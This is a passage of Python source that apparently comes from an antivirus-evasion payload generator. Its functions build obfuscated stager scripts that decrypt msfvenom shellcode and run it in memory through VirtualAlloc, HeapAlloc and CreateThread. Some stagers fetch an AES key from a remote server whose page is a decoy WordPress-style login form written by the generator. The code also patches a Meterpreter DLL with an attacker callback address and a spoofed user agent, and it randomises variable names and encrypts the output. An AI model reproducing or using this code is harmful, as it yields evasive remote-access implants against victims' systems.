PayloadCode += 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n' PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + 
ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"): metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll" else: metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll" f = open(metsrvPath, "rb") meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :] # patch the metsrv.dll header headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x57" headerPatch += "\x87\x05\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0" headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00" meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTP\x00" meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = ( "http://" + self.required_options["LHOST"][0] + ":" + str(self.required_options["LPORT"][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00" ) meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661)) expirationTimeout = struct.pack("<I", 604800) meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F)) communicationTimeout = 
struct.pack("<I", 300) meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n" payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n" randVarName = helpers.randomString() randFuncName = helpers.randomString() payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n' payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName + "()\n" # VirtualAlloc() injection else: payloadCode += "import ctypes,base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() randPtr = helpers.randomString() randBuf = helpers.randomString() randHt = helpers.randomString() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n" payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n' payloadCode += ( randPtr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + randVarName + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" ) payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + 
")).from_buffer(" + randVarName + ")\n" payloadCode += ( "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + randPtr + ")," + randBuf + ",ctypes.c_int(len(" + randVarName + ")))\n" ) payloadCode += ( randHt + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + randPtr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" ) payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n" if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() randctypes = helpers.randomString() # Create Payload code PayloadCode = ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += 'import ctypes as ' + randctypes + '\n' PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = 
self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() randctypes = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes as ' + randctypes + '\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == 
"heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() HeapVar = helpers.randomString() randctypes = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes as ' + randctypes + '\n' PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + 
timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() randctypes = helpers.randomString() # Create Payload code PayloadCode = 'import ctypes as ' + randctypes + '\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes 
+ '.c_int(0)))\n' PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() PayloadCode = 'from ctypes import *\n' PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandReverseShell + ' = \"' + Shellcode + '\"\n' 
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self):
    """Build the Python stager source for the AES / HTTP-keyed variant.

    Reads INJECT_METHOD, TARGET_SERVER, HTML_FILE_PATH, SLEEP_TIME,
    EXPIRE_PAYLOAD and USE_PYHERION from ``self.required_options``
    (every value is taken with ``[0]``).  Side effect on every taken
    branch: a decoy HTML page with a random HTML comment appended is
    written to ``HTML_FILE_PATH + <last path segment of TARGET_SERVER>``,
    and that exact page body is what ``encryption.encryptAES_http_request``
    derives the shellcode key from.

    Returns the generated source as a str.

    NOTE(review): when INJECT_METHOD is neither "virtual" nor "heap" and
    EXPIRE_PAYLOAD is not "x", no branch assigns PayloadCode and the
    method falls off the end, returning None.
    """
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
        # NOTE(review): a TARGET_SERVER ending in "/" yields an empty file
        # name here, so the open() below targets HTML_FILE_PATH itself.
        target_html_file = str(TARGET_SERVER.split('/')[-1])
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()
        # Generate Random Variable Names
        ShellcodeVariableName = helpers.randomString()  # unused in this branch
        RandPtr = helpers.randomString()
        RandBuf = helpers.randomString()
        RandHt = helpers.randomString()
        RandDecodeAES = helpers.randomString()
        RandCipherObject = helpers.randomString()
        RandDecodedShellcode = helpers.randomString()
        RandShellCode = helpers.randomString()
        RandPadding = helpers.randomString()
        # Define Random Variable Names for HTTP functions
        RandResponse = helpers.randomString()
        RandHttpKey = helpers.randomString()
        RandMD5 = helpers.randomString()
        RandKeyServer = helpers.randomString()
        RandSleep = helpers.randomString()  # unused
        # Define Random Variable Names for HTML Functions
        RandHttpstring = helpers.randomString()
        # Genrate Random HTML code for webserver to host key file
        # NOTE(review): path is built by plain concatenation and the file is
        # not opened with a `with` block; an unwritable HTML_FILE_PATH raises
        # IOError straight out of generate().
        f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
        html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """
        # The random comment makes every generated page (and therefore every key) unique.
        html_data += '<!--'+ RandHttpstring +'-->'
        html_data = str(html_data)
        f.write(html_data)
        f.close()
        # encrypt the shellcode and grab the HTTP-Md5-Hex Key from new function
        (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
        # Create Payload code
        PayloadCode = 'import ctypes\n'
        PayloadCode += 'from Crypto.Cipher import AES\n'
        PayloadCode += 'import base64\n'
        PayloadCode += 'import os\n'
        PayloadCode += 'import time\n'
        PayloadCode += 'import md5\n'
        PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
        # Define Target Server "Key hosting server"
        PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
        PayloadCode += 'while True:\n'
        PayloadCode += ' try:\n'
        # Open Target Server with HTTP GET request
        PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
        # Check to see if server returns a 200 code or if not its most likely a 400 code
        PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
        # Opening and requesting HTML from Target Server
        PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
        PayloadCode += ' '+ RandMD5 +' = md5.new()\n'
        PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
        # Genrate MD5 hash of HTML on page
        PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n'
        # Convert to 16 Byte Hex for AES functions
        PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
        # Convert to String for functions
        PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
        # Break out to decryption
        PayloadCode += ' break\n'
        # At any point it fails you will be in sleep for supplied time
        PayloadCode += ' except URLError, e:\n'
        # SLEEP_TIME is spliced into the generated source verbatim; it is not validated as a number.
        PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
        PayloadCode += ' pass\n'
        # Execute Shellcode inject
        PayloadCode += RandPadding + ' = \'{\'\n'
        PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
        # The key is the MD5 hex digest of the fetched page body, so the served
        # page must match html_data byte-for-byte (random comment included).
        PayloadCode += RandCipherObject + ' = AES.new('+ RandHttpKey +')\n'
        PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
        PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)
        return PayloadCode
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
        # NOTE(review): same empty-file-name caveat as the "virtual" branch.
        target_html_file = str(TARGET_SERVER.split('/')[-1])
        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()
        # Generate Random Variable Names
        ShellcodeVariableName = helpers.randomString()
        RandPtr = helpers.randomString()
        RandBuf = helpers.randomString()
        RandHt = helpers.randomString()
        RandDecodeAES = helpers.randomString()
        RandCipherObject = helpers.randomString()
        RandDecodedShellcode = helpers.randomString()
        RandShellCode = helpers.randomString()  # unused in this branch
        RandPadding = helpers.randomString()
        RandToday = helpers.randomString()  # unused
        RandExpire = helpers.randomString()  # unused
        HeapVar = helpers.randomString()
        # Define Random Variable Names for HTTP functions
        RandResponse = helpers.randomString()
        RandHttpKey = helpers.randomString()
        RandMD5 = helpers.randomString()
        RandKeyServer = helpers.randomString()
        RandSleep = helpers.randomString()  # unused
        # Define Random Variable Names for HTML Functions
        RandHttpstring = helpers.randomString()
        # Genrate Random HTML code for webserver to host key file
        f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
        html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """
        html_data += '<!--'+ RandHttpstring +'-->'
        html_data = str(html_data)
        f.write(html_data)
        f.close()
        # encrypt the shellcode and grab the randomized key
        (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
        # Create Payload code
        PayloadCode = 'import ctypes\n'
        PayloadCode += 'from Crypto.Cipher import AES\n'
        PayloadCode += 'import base64\n'
        PayloadCode += 'import os\n'
        PayloadCode += 'import time\n'
        PayloadCode += 'import md5\n'
        PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
        # Define Target Server "Key hosting server"
        PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
        PayloadCode += 'while True:\n'
        PayloadCode += ' try:\n'
        # Open Target Server with HTTP GET request
        PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
        # Check to see if server returns a 200 code or if not its most likely a 400 code
        PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
        # Opening and requesting HTML from Target Server
        PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
        PayloadCode += ' '+ RandMD5 +' = md5.new()\n'
        PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
        # Genrate MD5 hash of HTML on page
        PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n'
        # Convert to 16 Byte Hex for AES functions
        PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
        # Convert to String for functions
        PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
        # Break out to decryption
        PayloadCode += ' break\n'
        # At any point it fails you will be in sleep for supplied time
        PayloadCode += ' except URLError, e:\n'
        # SLEEP_TIME is spliced into the generated source verbatim; it is not validated as a number.
        PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
        PayloadCode += ' pass\n'
        # Execute Shellcode inject
        PayloadCode += RandPadding + ' = \'{\'\n'
        PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
        # NOTE(review): unlike the "virtual" branch, the key passed to AES.new
        # here is the generator-side `secret` embedded into the script; the
        # RandHttpKey value fetched and hashed above is never used.
        PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
        PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
        PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
        PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)
        return PayloadCode
    else:
        # NOTE(review): there is no `else` for the EXPIRE_PAYLOAD test below,
        # so any other EXPIRE_PAYLOAD value makes generate() return None.
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
            target_html_file = str(TARGET_SERVER.split('/')[-1])
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandPtr = helpers.randomString()  # unused in this branch
            RandBuf = helpers.randomString()  # unused in this branch
            RandHt = helpers.randomString()  # unused in this branch
            RandDecodeAES = helpers.randomString()
            RandCipherObject = helpers.randomString()
            RandDecodedShellcode = helpers.randomString()
            RandShellCode = helpers.randomString()  # unused in this branch
            RandPadding = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()  # unused
            RandMemoryShell = helpers.randomString()
            # Define Random Variable Names for HTTP functions
            RandResponse = helpers.randomString()
            RandHttpKey = helpers.randomString()
            RandMD5 = helpers.randomString()
            RandKeyServer = helpers.randomString()
            RandSleep = helpers.randomString()  # unused
            # Define Random Variable Names for HTML Functions
            RandHttpstring = helpers.randomString()
            # Genrate Random HTML code for webserver to host key file
            f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
